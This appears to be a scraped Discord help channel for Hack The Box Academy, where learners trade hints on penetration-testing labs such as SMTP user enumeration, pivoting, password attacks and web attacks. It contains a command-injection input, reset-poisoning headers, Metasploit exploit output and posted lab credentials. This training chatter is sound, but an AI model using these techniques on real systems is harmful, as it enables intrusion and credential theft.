Has anyone managed to get the last question requiring you to use the VNC password to connect to the DC after you decrypt it? I've got the shell on the backup and set up my routes; however, I keep getting a refused connection. Kinda lost at this point of what else to do, i've even tried to set up pivoting and it still not liking it.

The best way to solidify your understanding is to run it

Exactly what MarcieLee said, also just playing around and testing will further help solidfy it.

please I want to learn how to crack smtps

What module and section?

Is it the footprinting smtp? Common services smtp? NEI to properly push you forward

I Want to learn the both please help

Buddy

Is your question related to an htb academy module

If not, those modules both cover smtp to an extent

ok how do i procced

If your question isn't related to those modules, then this isn't the channel to ask your question

guys can someone help me with bash script?

comparison operators section of introduction to bash scripting

snd me dm i'll try

Can I get a sanity check for advanced CSRF skill assessment

I managed to get a working XSS payload but the bot won’t click when I try to access the admin endpoint or promote myself

It works when I visit my page but for some reason it doesn’t work with the bot

I did it a different way, but I'd imagine theres a client somewhere?

I tried the client from the RDP point as well. lol. having had to stop and start this module 3 times due to kids. not sure if i missed something at this point.

Hi guys I'm learning the web proxy module and I'm stuck on the repeating requests I would appreciate some one to help me when I send a request trying to get the flag in burp like send ip=1; ls /home I get no response body but tried wrap it in echo but still get the same response I don't what to do guys even chatgpt has failed me

I have a problem submitting an answer to a question in Analytics machine, can anyone help me!!!

Best to ask in #modules

i run lsb_release command on the machine, it gives output with xx.xx, but the question has xx.xx.xx format, how can i submit that

wrong link LOL

they meant to tell you to ask in #boxes; you'll need to link your account following instructions in #welcome to access it

welcome channel redirects me here

there's a set of 3 instructions at the bottom of #welcome

Oh damn, you're right 🙈

the "redirect" is discord (because you don't have permissions to type in #welcome) directing you to the "latest active channel" which is nothing that we can control

ok thanks

@vocal hollow i suggest not talking about specific attacks, especially for a skills assessment

Would really appreciate a hint of what I'm doing wrong on HTTP Response Splitting part of HTTP attacks

Module = Footprinting smtp

Question :- Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

The things I have tried ... Checked if I can use the VRFY cmd , also tried to brute force the users with smtp-user-enum tool with the resource wordlist , now I'm planning to do wordlist mutation .. am I in the right track ?

can someone help me with password attacks skill assessment, im on jump01 i tried looking for creds with snaffler i found a *.*3 file that i couldnt crack is there another way?

More than likely, not enough encoding

Can anyone offer a helping hand with the credential hunting in network shares, Im stuck, Thanks

Already tried urlencoding up to 5 times, must be something else wrong

Hmm okay, DM me?

smtp is sloooooow

Ya they also said something about this in the hint ... So ? What should I try ?

well smtp-user-enum has a way to adjust the wait time

So I'm on the right track ?

yes

iirc it's -w

it's either -w -W one of them adjusts workers

K thx . And can u suggest a tool which is used for mutation? Or should I use a py program

Hey someone else also facing this kind of issue with HTB

It's my issue or something else

MY INTERNET IS PROPERLY WORKING
I AN NIT USING ANY PROXY
BUT STILL THIS NOT GETTING THE TARGET WEBSITE

Have u connected the vpn ?

Bu it's not needed and also not instructed above TARGET

It's a public facing target

Worked for me. Did you try prefixing the URL with http://?

I think

Which is the module ?

Web attacks - by passing encoded references

probably something with your internet/network. does it work on your host pc?

Internet is properly working on my pc

welp like i said, works for me. i used your exact instance and it loaded just fine. try another browser or try it on your host pc.

Connect the vpn and try it will work

VPN has nothing to do with this

Ok wait

Kali is my itself host PC

No windows

I have not faced any module till now which is accessible publicly

How

U sure ?..

Form past 1 week I am facing all public ips

It's wired

Yep

But what problem here ?

something with your routing/internet/network. maybe try ctrl+shift+r on the website.

Hmm 🧐

It opens (10 min after clicking)

always best to include the module and section you're on

That is not the correct answer. "UNION" is not a type of SQL Injection. UNION is a SQL operator.

the operator does play a role but you also need to include the type

Is there a particular channel to have an admin look at a server that can not accessbile after spawning?

That would be support

https://help.hackthebox.com/en/articles/5987511-contacting-academy-support

But make sure you’re connected to the vpn

I am connected. 🙂

What module and what’s the issue? If it’s RDP and a black screen, try pressing enter

I have done several. This is on is not reachable. Restarted my box, target, etc. Sorry, I just realzed this is Academy, not Lab. I don't really see a channel for Labs.

Please read #welcome and #rules it will explain how to get verified

This’ll get you access to #boxes

tyvm!

But tech support, is not on discord

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

New to HTB platform. I figured it out. I did not realized you needed a different openvpn config file for LABS.

I am on Password Attacks - Attacking protected archives. I am unable to install dislocker. I have tried sudo apt-get install dislocker, and I get a bunch of failed to get, not found 54.39.128.230 80 errors. I have tried changing VPN regions, and tried disconnecting from the VPN. I tried installing it from github using git clone https://github.com/Aorimn/dislocker. No errors, it just doesn't install. Any idea?

Which section is that?

Password Attacks - Attacking protected archives

Are you on the web hosted VM?

The Parrot OS one?

No, personal Kali VM.

Turn off the VPN and then try apt get or apt install whatever it is.

Also what is this failed to get not found IP port? Can I see the screenshot?

I've tried that, and changing VPN regions.

And it says failed to get , not found and then says an IP and Port?

Try to update and upgrade your Kali first.

E: Failed to fetch http://http.kali.org/kali/pool/main/d/dislocker/libdislocker0.7t64_0.7.3%2Bgit20240607-3_amd64.deb 404 Not Found [IP: 54.39.128.230 80]
E: Failed to fetch http://http.kali.org/kali/pool/main/d/dislocker/dislocker_0.7.3%2Bgit20240607-3_amd64.deb 404 Not Found [IP: 54.39.128.230 80]

What is this IP you are showing Not Found not found? Are you on some kind of proxy or something?

Do this first
sudo apt update and then sudo apt upgrade

Those are not working either, getting: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures couldn't be verified because the public key is not available: NO_PUBKEY ED65462EC8D5E4C5

anyone here who have experianced on CPTS from htb

could someone help me in password attack skills assessment

Why?

wanna know something about it

About what?

what if i purchase VIP+ - $20/month then i can also access CPTS modules

No

That’s the main platform. Academy is a different subscription and platform

Read this: https://help.hackthebox.com/en/articles/5720974-academy-subscriptions

okay

i understood

on months subscription i can access training paths for the certificates

onces i have completed then i can go for certificate exam

@storm elk am i right ?

The monthly subscriptions give you a number of cubes, which you can then use to buy modules

Month subscription will give you cubes. You can use those cubes to purchase modules. When you’ve finished a path, you can buy an exam voucher. An exam voucher is solely included with the yearly subscription.

With the monthly subscription, the exam voucher is to be purchased separately

i know its like same as thm

talking about this
Exclusive Subscriptions
Student 👨‍🎓

For students and professors of universities and other academic institutions.

Price: $8/month (USD)

Access Based

Direct access to all modules up to (including) Tier II

    This includes the Bug Bounty Hunter, Penetration Tester, and SOC Analyst paths.

Unlimited Pwnbox usage

CPE credits submission

The Student Plan requires that you be a student or professor at an Educational or Academic Institution. This includes High School/Secondary School, University, Trade School, etc.

Yes, this subscription gives you access to modules in the mentioned paths

okay everything cleared

Hello,
I have a question about the AD Enumeration & Attacks Module, Skills Assessment Part II.
I completed the assessment but didn't get one part.
Why doesn't the method used in Question 1 (to obtain user credentials) work on question 9 (obtain other user credentials). The method works if executed elsewhere for question 9, but not from the starting point (when doing question 1) even though both machines are on the same network...!?

which on is easier for beginner CBBH or CPTS ?

I think CBBH is easier (not easy at all)

and what if i wanna purchase 8$ per month student plan but the problem is i am from pakistan

i dont have any email provided by academic institution

These are questions only support on the website can answer. I'm not sure why it would matter where you're from unless they don't recognize the .edu, but in that case you'd still need to reach out to support on the site.

but i am student

okay thanks

https://help.hackthebox.com/en/articles/7973133-getting-the-student-subscription

There's an option for that where you have to share your id card and, they'll let you access the student subscription

https://www.kali.org/blog/new-kali-archive-signing-key/

Hi i have an error when i try to install openvas in vulnerabilty assesment module i updated and upgraded

And what's the error say?

Hello guys for things like the LFI Module should i be testing for manual then automated or automated then manual?

I don't think it matters which way around you do it.

Openvas stuff hasn't been updated in the repos

Ah ok because openvas is in the path of cpts, and I have questions but i can't install

anyone???

Hey guys, first time talking. Could someone help me in telling what do people do when they get bored trying to study from HTB Academy? It's really good but it's just like I need a way to practice but I can't.

I"m working on the "Intro to evil twin attacks section", and under the EAPhammer automated attack, the entire written example does not match the lab. There are no boxes attached to "HTB-Wireless" but there are to HTB-Corp. All the notes say to attack HTB-Wireless, amy I missing something ?

Hi, i have the same problem with Password attacks - skill assessment, im stuck as well at DMZ01, have spent about 3-4 hours trying to find priv esc factor, found the hw**** user creds at certain place, but they dont seem to be working anywhere. have set up chisel with proxychains, but cant seem to get nmap working correctly.
Is it possible for me to get a hint or a nudge towards specific direction, what may i have missed or what host should i focus on?

what modules can you recommend for level 1?

Level 1 what?

tier 1

I would just follow a path if you're new

Notes are incorrect, had to attack HTB-Corp, and had to use a \t for the ssid stripping as opposed to \x20 in the notes... It's frustrating that sometimes the lab notes are identical and copy paste, and then for others you're supposed to improvise, without any indication whether you should be improvising or not.

I went through everything fundamental

I think thats intended for you to think for yourself and gradually stop following guides step by step.

You could start the CPTS path than?

I'm all about that, and would prefer that over the blind copy paste, but at least an indication "attack this network" when the notes say "attack the other network", would be nice

I recently bought the book black hat python what do you think about it experienced guys?

This channel is for talking about Academy modules, its probably best if you ask in https://discord.com/channels/473760315293696010/588029217376043023 about that

oh sorry

hey sorry does bloodhound module really teaches the basic of bloodhound or the complete tutorial and advanced stuff ?

Is there anyone online who has done that module?

Hi, welcome. Please read the #rules and follow the instructions in #welcome to gain access to more channels. This channel is dedicated for discussion of the various modules on HTB Academy.

IG we'll have to ask the same ques tmr

I guess so. It is getting late

what seems to be the issue that youre having ? whats your question?

Here is my problem/question

OpenVAS is installed on the target system

Hey guys, I am currently working on Intrusion Detection With Splunk (Real-world Scenario). I have every question done except the third question. I am not sure if I am just overthinking it or what but I have been working on it for a few days and can't seem to get it. Not sure if anyone has an tips to help get me in the correct direction.

@fair valve this isn't a hacker4hire server

and that's 100% scam for sure

Can anyone give us a hint on Q4 Skills Assessment for Bypassing WiFi Captive Portals.

Howdy folks, anyone available?

don't ask to ask just ask

Was anyone successful in using FinalRecon for Information Gathering - Web Edition > Skills Assessment?
My command looks like "./finalrecon.py --url http://<target ip>:<target port> --full" but the dump files are empty.

Ohhh, sorry

I am struggling with the Conditional Execution for the introduction to bash scripting. can anyone help me out? i'd very much appreciete it

I tried out so many codes and no matter what's the output i'd echo, it'd give me an incorrect message

It'd help if you could show the script you wrote

I had multiple attempts prior. If it’s not too much to ask for, are you available for a voice chat atm?

Hi... Hope you are all doing well. I'm actually new here

Just wanna introduce myself

I'm in cyber security with experience of 1 year specifically in offensive security field

Right now I am learning about web pentesting pathway through tryhackme .. so which is the best option

Should I switch directly to hack the box or should I first learn deep about web pentesting doing portswigger labs

Also plz guide me which modules if hack the box are really best in offensive security

If your focus is web then I suggest doing the bug bounty hunter job path on academy

All of those resources will help in some capacity so if you want to complete the thm path first then move to htb and portswigger, that’s fine

Showing the code over text should be enough

I’ll show it whenever I get a chance

Btw, thank you so much for your response @safe star @waxen totem 🙏🏽

@rustic sage please take care not to post content from modules above tier 0

You simply state the module/section/question you're on, what problems you're running into, etc. Anyone who has done the module knows how to get the answer. And if you feel like you need to reveal a little more you can ask to take it to DM's.

hey @fathom pendant i was doing this task ... after trying for couple of hrs i was not able to find the user , so i planned to use msf console instead and was able to find the flag in the first go .. so i just wanted to know how I was not able to get the flag in smtp_user_enum was there some flag i was missing ?
the command i used was : smpt_user_enum -M <mode> -U <user.txt> -t <ip>
and i also tried to mutate the resource file but still the result was same.

ANYONES HELP will be appreciated

-w <-- timing

Ya I forgot about that one ... U did suggest that yesterday too 🥲

Guys i need help

Can anyone help my by pwning a windows machine in HTB

I am a beginner

Please DM

machine name? and best to ask in #boxes

Fluffy

I am a beginner

#boxes

I dont have access it says

Wait

#welcome read and verify

you will get access

Ok yes

I did it

Bro i gave some messages there

Thanks

Hello guys, I am in
Attacking Active Directory and NTDS.dit chapter (Password attack module). Problem with third question.

I have used username-anarchy to create a username list which it worked. It gave me around 43 different username types.

I have an issue with Kerbrute. It is only using 21 of the names in the my generated list and no result. However I checked every single names in the list with kerbrute, still unsuccessful. Am i doing something wrong?

now you have to wait. someone who solved it already will reply you msg

Ok thanks

domain error? (something like -wrong realm. and so on)

it says those workers work with Inlanefreight, and i used inlanefreight.local? no?

screenshot (in dm)

hi, i was working on the shells & payloads module skill assessment (the one w multiple targets). was wondering if there are ways to solve them without using the hints that provide the credentials? would it just be brute forcing or are there more deliberate ways?

Does anyone have an explanation of why the map with a size of 0000000000003000 is interesting for the Attacking Thick Client Applications section?

if you want to watch the whole walkthrough explained,
https://youtu.be/FbTxPz_GA4o?t=1500
It was part of retired windows insane box PivotAPI
Next section is the retired linux insane box Fatty

They're both insane boxes, wow.

Interesting for a medium difficulty module.

i dont recall any bruteforcing in SA of shells & payloads

guyz i am stucked here !!!
SSH to 10.129.202.64 (ACADEMY-PWATTACKS-NIX01) with user "sam" and password "B@tm@n2022!"

• 0 Use the credentials provided to log into the target machine and retrieve the MySQL credentials. Submit them as the answer. (Format: <username>:<password>)
  this is from password attacks modue in submodule named spraying and stuffing and defaults
  can anyone give hint !!!

yep default passwords is the hint, repeat what you have seen in the section.

bro see i logged into the ssh and tried to install the default passwords list but the sam isnt in root

that is installed on your attackhost

so you can check default creds through CLI, that is not a requirement per say, you check defaults through google

Hi guys i’m new here, does anyone know anything about ip addresses etc that i can contact privately?

delete this. as it is spoiling the module content

thats what i did after this didnt runned on my ssh , so i just runned it on my attack maheiom

and -ppasswd is the syntax

let me try , thanks !

hey thansk man !!

i was today years old when i found out why ive always had a hard time logging into mysql

i was just doing mistake there syntaxxxx i was using the space or like trying it again and again from mornign !! thanks a lot man !!! this minor mistakes happens a lot with me due to panic solving , thanks man !!

the space makes mysql think you are referencing a db or something

yeah but i was like totally into the conentrated on like bruteforcing thinking like ther emight be another root user

yeah lmao its the little things

Module: ABUSING HTTP MISCONFIGURATIONS   
Section: Password Reset Poisoning

I tried injecting all these header with interactsh.local:PORT value:
||Host
X-Forwarded-Host
X-Host
X-Original-Host
X-Forwarded-Server
Forwarded
X-Forwarded-For ||
and still in the /log page I dont see the reset token.

And also this, I don't understand what's wrong with all the tasks in this module
Module: Abusing HTTP Misconfigurations
Section: Host Header Web Cache Poisoning

For the lab I have succesfully found which overwrite host header that is unkeyed and updates the url in login form to point to interactsh.local:port. I have verified with a bogus login try that log in requests are sent to interactsh. However the admin never seems to try login so a request with the password is never sent.

Can anyone help me with password attack skill assessement? I got access to jump01 and searched the shares got .psafe file and one hash from the .xml file and also got a clear text password from the .xml file. But don't know what to do now i am lost.

Hey, were you able to solve the issue? Facing the same problem, don't know what to do with it

Hey guys, im currently doing Shells & Payloads Module in Infiltrating Unix/Linux section. And I encountered this problem

msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > exploit
[*] Started reverse TCP handler on xx.xx.xx.xx:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] 3.9.6 of rConfig found !
[+] The target appears to be vulnerable. Vulnerable version of rConfig found !
[-] Exploit failed: NameError uninitialized constant Msf::Modules::Exploit__Linux__Http__Rconfig_vendors_auth_file_upload_rce::MetasploitModule::RHOST
[*] Exploit completed, but no session was created.

Has anyone solved this issue?

crack .psafe file

should work without any issues. but this line
[-] Exploit failed: NameError uninitialized constant Msf::Modules::Exploit__Linux__Http__Rconfig_vendors_auth_file_upload_rce::MetasploitModule::RHOST hints u forgot to set rhost

okay, i'll try

msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > set RHOST 10.129.201.101
RHOST => 10.129.201.101
msf6 exploit(linux/http/rconfig_vendors_auth_file_upload_rce) > exploit
[*] Started reverse TCP handler on xx.xx.xx.xx:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] Cannot reliably check exploitability. Can't access the rConfig web interface ! ForceExploit is enabled, proceeding with exploitation.
[-] Exploit failed: NameError uninitialized constant Msf::Modules::Exploit__Linux__Http__Rconfig_vendors_auth_file_upload_rce::MetasploitModule::RHOST
[*] Exploit completed, but no session was created.

Still doesn't work

Anyone know why I can't execute directly the executable of LaZagne (https://github.com/AlessandroZ/LaZagne/releases) from the last release on a windows target desktop ?
I tried to compile with pyinstaller and nuitka but doesn't working

For the Password Attacks module in the Credential Hunting in Windows section

using .exe version?

Yes

And trying to compile the python file

why are you compiling .exe file?

Python file*

show your terminal ss what you exactly doing

with pyinstaller or nuitka

coz i always use lazagne.exe and it works like charm

please send screenshot for clear picture

Ok i'll try thanks btw.

any clue guys?

Try RHOSTS instead of RHOST

I can't reproduce the bug, it works
Thank you for your reply !

I did, that was the first try

but it keeps forcing me to add RHOST

after I added RHOST it still wont work

What are the options

hey, im having a lab environment for my school on my own device set up with this information:

192.168.30.21: Open ports & Services & Operating System Information
OS Details: Microsoft Windows Server 2022
Hostname: DC01

• 53 (Domain Simple DNS Plus)
• 88 (Microsoft Windows Kerberos)
• 135 (Microsoft Windows RPC)
• 139 (Microsoft Windows NetBIOS-ssn
• 389 (Microsoft Windows Active Directory LDAP Domain: dsmit.local, site: defaut-first-site-name)
• 445 (Microsft DS wat gebruikelijk een Netwerk share is)
• 464 (kpasswd)
• 593 (Microsoft Windows RPC HTTP 1.0)
• 636 (tcp wrapped)
• 3268 (Microsoft Windows Active Directory LDAP Domain: dsmit.local, site: defaut-first-site-name)
• 3269 (tcpwrapped)
• 5357 (Microsoft HTTPAPI httpd 2.0)
• 3985 (Microsoft HTTPAPI httpd 2.0)

192.168.30.22: Open ports & Services & Operating System Information
OS Details: Linux 4.15 – 5.19

• 22 (OpenSSH 9.6 Ubuntu Linux Protocol 2.0)
• 80 (nginx 1.24.0)
• 8080 (Jetty 10.0.18

192.168.30.128: Open ports & Services & Operating System Information
OS Details: Windows 11 21h2

• 135 (Microsoft Windows RPC)
• 139 (Microsoft Windows NetBIOS-ssn)
• 445 (Microsoft DS)

the goal is a root shell (i already have that) but i also need a domain admin account, anyone has any idea how i could procceed, smb somehow doesnt work with everything ive tried

You can DM me if you still need help with the module! 🙂

current release version has some dependency issues due to the way it was built. There is a new commit that will fix the problem but only when AlessandroZ publishes a new release tag. But its probably just better to build it yourself using pyinstaller the spec file is already in the repo.

Seems like to me if you had it originally set as RHOSTS and it still referenced RHOST you need to manually change the RHOST refs in the exploit to RHOSTS

RHOST is deprecated

cant connect to the rdp on "Pass the Ticket (PtT) from Windows" - Password attacks. Do I just try again later or?

Your post has nothing to do with the HTB Academy modules. Read and follow #welcome to get better channels for your request

my bad

Check user access

Thanks!

hello again i've returned hahahaha
in the module of the URL, I just need to confirm that I am doing it correctly for the last question everything seems ok its just the web page doesnt load on my device of the server with the octet of 135
and no it should work because I can curl the http page and grab the flag there, but I would like to know why though? as I've teaming up with someone else while doing the same module but he couldnt get the web page to curl but view the HTTP page in web browser...

also learnt some spooky stuff about ARP on this module reforcing my knowledge on networking 😄
https://academy.hackthebox.com/module/158/section/1434

whoops figured it out had to put the password in single quotes 🤦‍♂️

bro i need help

i need someone who knows how to hack to help me get my account back

cant help you with that also run before the admins come and get you banned

The best thing to do is to contact Acoount support

ie google, Instagram, etc

learn and get it back yourself i recommend you start with htb academy 😄

That is not what this discord is for, and if you lost your account, its best to talk to the site and communicate it with them. As it is illegal for anyone to "help" you get it back. bare in mind there are lots of scams out there who'll offer to help you and are just stealing your money.

Hey people..this is someone who is starting with cybersecurity .. I am currently enrolled in a computer - science engineering course in my university.. Just completed the Intro to Academy module and begun with Learning process

heya, I am doing the "web requests - http headers" exercise and I need to find the flag in the devtools of the browser, I found the flag but it does not work

seems to be a bug.

nvm, the request had to be opened, a bit misleading lol especially with the hint " Hint

Look for a request to a file called 'flag_...'. If you can't find it, refresh the page and monitor new requests. "
😄

Does anyone have any tips for the Password Attacks Skills Assessment? I have ssh access to DMZ01 and found credentials for another user in FILE01. Now I need to pivot via DMZ01, and although I've tried proxychains and chisel, nothing seems to be working. The proxy itself seems to be working, but I can't reach FILE01 through it - I've tried nmap scans as well as requests to common services but I usually get a timeout error or an immediate error. I can't even ping FILE01 from DMZ01 even though they should be in the same subnet. Am I doing something wrong, or could this be an issue with the environment?

Thank you sm, this works

is there anyone doing Skills Assessment - Password Attacks?

it's a proxychains problem, u have to use another pivoting tool

that module is so hard

Hey guys, anyone around for sanity check on Android Fundamentals ?

Create an AVD for 'Pixel 3a API 34 Google APIs' using Android Studio. What is the build number of the device? (Format: build_number, Example: build_number-test)

I made the device, but my answer is never correct, I don't think my build number is wrong. Any help would be appreciated

I see, thank you for your response. Maybe I will try ligolo? If proxychains doesn't work on this assessment, not sure why they would explicitly tell you to look at the cheat sheet and use proxychains!

Hi all, in stuck on the module "Broken authentication" in the section Brute-forcing Password.
In the task the second question say what is a pwd of admin user, i tried with login bruteforce and i used grep for filter pwd as indicated in the policy, i tried to brute force the token param via GET and POST but nothing.
Any hint for this?
Greetings

@tidal lintel send me your answer via dm

sent

hey im really stuck on Passwords attack credential hunting in network shares the second question i would really appreciate some help

proxychains worked fine for me make sure you edited etc/proxychains.conf to the right port , also in nmap specify ports.

Spider and search for a keyword. Keyword is in the question.

Hi

Hi @sacred rock can you help me?
Greetings.

Pay attention to the password requirements, then think what can you possibily do with those

Sure, i used the grep command to filter the words in the list with the requirements on the page but not works

If you have used the new trimmed password list to brute-force the admin account and no password was found, you did it wrong. Check again.

Or maybe you are fuzzing wrong, that is a possibility too

Ok thanks I check again when I return to the PC.
Thanks a lot.

I fuzzed for the login the post request, i fuzzed the param token but any token returned from the fuzz

In two different bruteforce with ffuf

But the scope is not the token if rhe question request the password for the admin user, right?

Yeah, don't need to interact with anything token related for this question, you just need the correct password

Good morning all. I'm still stuck on Information Gathering - Web Edition > Skills Assessment > Questions 3-5.
I've tried using dnsenum (errors out with "NS record query failed: NXDOMAIN") and ReconSpider. Neither get any results. I don't want to include too many details and get in trouble.
Forgot to add - /etc/hosts has been updated with the lab info.

You forgot to check for something important, starts with V, you need more recon.

i agree with u, they must

Hi there! Sorry if I’m writing in the wrong section, I really enjoy using HTB Academy; it’s been a fantastic learning resource.
I’ve noticed that some modules (even those that require quite a bit of research and time) award 0 cubes when completed. Is there a particular reason for this?I feel that even a small cube reward for these modules would help motivate learners and acknowledge their effort. Still great content. thanks for your time.

Proxychains works too, the only problem is that you need to have to configure a lot of things correctly, missing one small thing will make it not work. Ligolo-ng just takes away that pain because it's easier overall to configure and it is more powerful too because the way it works. But it can be done with proxychains too, no issues.

Hi, I am doing SQLMap Essentials module Attack Tuning section, i ran the command ||sqlmap -u "http://targeet.com/case5.php?id=1" --dump --level=5 -T flag5 -C id,content --risk=3 --batch -T flag5||
from my machine and it gave me a wrong flag, then i ran the exact same command on the pwn box and it gave me the valid flag
can someone explain?

Pretty sure I just tried what you were hinting at...zero results 🤣
Should it target the IP address:port or the url:port (inlanefreight.htb:49203, tried targeting this and it failed)

i tried spidering with netexec and powershell but found nothing..

Url + port, don't forget --append-domain option

Maybe not the right keyword

Yep, this is what I tried. Can I throw my command in here?

What wordlist? Send me via dm

i did INLANEFREIGHT

Try something else

like what 🙂

What account are you looking for?

Hi

thanks bro

Thanks a lot

@rustic sage make sure there's no spaces at the end of your copy paste

What module and section ?

Bloodhound - Nodes (no results from the .zip pointing to this question)

Question + excersice code:

I tried out this one, didn't work for me

you need to exit the loop after 35 run throughs.

then after that you need to count the characters, in this case i believe they don't want you to get rid of the new-line (\n) in the count

Loop ends after the 35th attempt, right?

I can't figure out how to ssh for this section: https://academy.hackthebox.com/module/51/section/1592
I tried both with and without the vpn connection. The commad I use is ssh htb-student@10.129.xxx.xxx.

also do i have to modifiy the excersice code or do i add a new loop?

you have to modify the existing loop

gotcha. so instead of 40 , it becomes 35

the only thing that should be modified inside the loop, not the parameters of the loop

Gotcha

What am I doing wrong?

For proxychains, the steps are ssh -D port DMZ01 IP --> edit conf file to socks5 127.0.0.1 port --> (sudo) proxychains command. Am I missing anything? I've tried using different ports, using socks4 instead of socks5, and using chisel but nothing works. Also, is it normal to not be able to ping or nc FILE01 from DMZ01?